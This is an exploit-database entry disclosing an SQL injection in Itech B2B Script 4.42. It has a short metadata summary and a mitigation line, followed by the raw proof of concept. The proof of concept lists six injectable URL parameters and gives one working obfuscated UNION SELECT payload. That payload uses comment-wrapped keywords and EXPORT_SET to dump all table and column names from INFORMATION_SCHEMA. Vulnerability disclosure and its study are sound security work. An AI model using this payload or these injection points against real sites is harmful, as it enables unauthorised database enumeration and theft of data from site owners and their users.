Itech B2B Script 4.42 - SQL Injection

vendor:

Itech B2B Script

by:

Ihsan Sencan

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Itech B2B Script

Affected Version From: 4.42

Affected Version To: 4.42

Patch Exists: NO

Related CWE: N/A

CPE: a:itechscripts:itech_b2b_script

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2017

Itech B2B Script 4.42 – SQL Injection

The vulnerability allows an attacker to inject sql commands into vulnerable parameters in the application. Proof of Concept examples are provided in the text.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, parameterized queries should be used to prevent SQL injection.

Source

Exploit-DB raw data:

# # # # #
# Exploit Title: Itech B2B Script 4.42 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : http://itechscripts.com/
# Software Link: http://itechscripts.com/c/B2B/
# Demo: http://b2b.itechscripts.com/
# Version: 4.42
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE:
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
# http://localhost/[PATH]/catcompany.php?token=[SQL]
# -1048a1d0c6e83f027327d8461063f4ac58a6'+/*!22222union*/+/*!22222select*/+0x31,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x33,0x34,0x35,0x36--+-
#
# http://localhost/[PATH]/search.php?keywords=[SQL]
#
# http://localhost/[PATH]/search.php?rctyp=[SQL]
#
# http://localhost/[PATH]/buyleads-details.php?id=[SQL]
#
# http://localhost/[PATH]/category.php?token=[SQL]
#
# http://localhost/[PATH]/company/index.php?c=[SQL]
#
# Reference:
# 
# # # # #